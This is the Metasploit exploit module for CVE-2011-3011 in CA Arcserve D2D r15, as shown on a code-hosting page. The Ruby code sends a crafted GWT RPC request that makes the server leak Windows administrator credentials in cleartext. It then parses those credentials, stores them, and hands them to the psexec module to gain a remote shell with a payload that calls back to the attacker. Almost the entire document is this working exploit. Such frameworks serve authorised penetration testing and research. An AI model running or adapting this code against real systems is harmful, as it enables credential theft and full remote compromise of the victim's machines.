Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Auxiliary::Report
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'CA Arcserve D2D GWT RPC Credential Information Disclosure',
17
'Description' => %q{
18
This module exploits an information disclosure vulnerability in the CA Arcserve
19
D2D r15 web server. The information disclosure can be triggered by sending a
20
specially crafted RPC request to the homepage servlet. This causes CA Arcserve to
21
disclosure the username and password in cleartext used for authentication. This
22
username and password pair are Windows credentials with Administrator access.
23
},
24
'Author' => [
25
'bannedit', # metasploit module
26
'rgod', # original public exploit
27
],
28
'License' => MSF_LICENSE,
29
'References' => [
30
[ 'CVE', '2011-3011' ],
31
[ 'OSVDB', '74162' ],
32
[ 'EDB', '17574' ]
33
],
34
'DefaultOptions' => {
35
'EXITFUNC' => 'process'
36
},
37
'Privileged' => true,
38
'Payload' => {
39
'Space' => 1000,
40
'BadChars' => "\x00\x0d\x0a"
41
},
42
'Platform' => 'win',
43
'Targets' => [
44
[ 'Automatic', {} ],
45
],
46
'DisclosureDate' => '2011-07-25',
47
'DefaultTarget' => 0,
48
'Notes' => {
49
'Reliability' => UNKNOWN_RELIABILITY,
50
'Stability' => UNKNOWN_STABILITY,
51
'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
}
53
)
54
)
55
56
register_options(
57
[
58
Opt::RPORT(8014),
59
]
60
)
61
end
62
63
def service_details
64
super.merge({
65
port: 445,
66
service_name: 'smb',
67
post_reference_name: self.refname,
68
last_attempted_at: DateTime.now
69
})
70
end
71
72
def exploit
73
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
74
75
data = "5|0|4|"
76
data << "http://#{datastore['RHOST']}:#{datastore['RPORT']}"
77
data << "/contents/"
78
data << "|2C6B33BED38F825C48AE73C093241510|"
79
data << "com.ca.arcflash.ui.client.homepage.HomepageService"
80
data << "|getLocalHost|1|2|3|4|0|"
81
82
cookie = "donotshowgettingstarted=%7B%22state%22%3Atrue%7D"
83
84
res = send_request_raw({
85
'uri' => '/contents/service/homepage',
86
'version' => '1.1',
87
'method' => 'POST',
88
'cookie' => cookie,
89
'data' => data,
90
'headers' =>
91
{
92
'Content-Type' => "text/x-gwt-rpc; charset=utf-8",
93
'Content-Length' => data.length
94
}
95
}, 5)
96
97
if not res
98
fail_with(Failure::NotFound, 'The server did not respond to our request')
99
end
100
101
resp = res.to_s.split(',')
102
103
user_index = resp.index("\"user\"")
104
pass_index = resp.index("\"password\"")
105
106
if user_index.nil? and pass_index.nil?
107
# Not a vulnerable server (blank user/pass doesn't help us)
108
fail_with(Failure::NotFound, 'The server did not return credentials')
109
end
110
111
user = resp[user_index + 1].gsub(/\"/, "")
112
pass = ""
113
114
if pass_index
115
pass = resp[pass_index + 1].gsub(/\"/, "")
116
end
117
118
srvc = {
119
:host => datastore['RHOST'],
120
:port => datastore['RPORT'],
121
:proto => 'tcp',
122
:name => 'http',
123
:info => res.headers['Server'] || ""
124
}
125
report_service(srvc)
126
if user.nil? or pass.nil?
127
print_error("Failed to collect the username and password")
128
return
129
end
130
131
print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
132
133
# try psexec on the remote host
134
psexec = framework.exploits.create("windows/smb/psexec")
135
psexec.register_parent(self)
136
137
psexec.datastore['PAYLOAD'] = self.datastore['PAYLOAD']
138
139
if self.datastore['LHOST'] and self.datastore['LPORT']
140
psexec.datastore['LHOST'] = self.datastore['LHOST']
141
psexec.datastore['LPORT'] = self.datastore['LPORT']
142
end
143
144
psexec.datastore['RHOST'] = self.datastore['RHOST']
145
146
psexec.datastore['DisablePayloadHandler'] = true
147
psexec.datastore['SMBPass'] = pass
148
psexec.datastore['SMBUser'] = user
149
150
print_status("Attempting to login via windows/smb/psexec")
151
152
# this is kind of nasty would be better to split psexec code out to a mixin (on the TODO List)
153
begin
154
psexec.exploit_simple(
155
'LocalInput' => self.user_input,
156
'LocalOutput' => self.user_output,
157
'Payload' => psexec.datastore['PAYLOAD'],
158
'RunAsJob' => true
159
)
160
rescue
161
credential_data = {
162
user: user,
163
private_data: pass,
164
status: Metasploit::Model::Login::Status::INCORRECT
165
}.merge(service_details)
166
create_credential_and_login(credential_data)
167
168
print_error("Login attempt using windows/smb/psexec failed")
169
print_status("Credentials have been stored and may be useful for authentication against other services.")
170
# report the auth
171
return
172
end
173
174
# report the auth
175
credential_data = {
176
user: user,
177
private_data: pass,
178
status: Metasploit::Model::Login::Status::SUCCESSFUL
179
}.merge(service_details)
180
create_credential_and_login(credential_data)
181
182
handler
183
end
184
end
185
186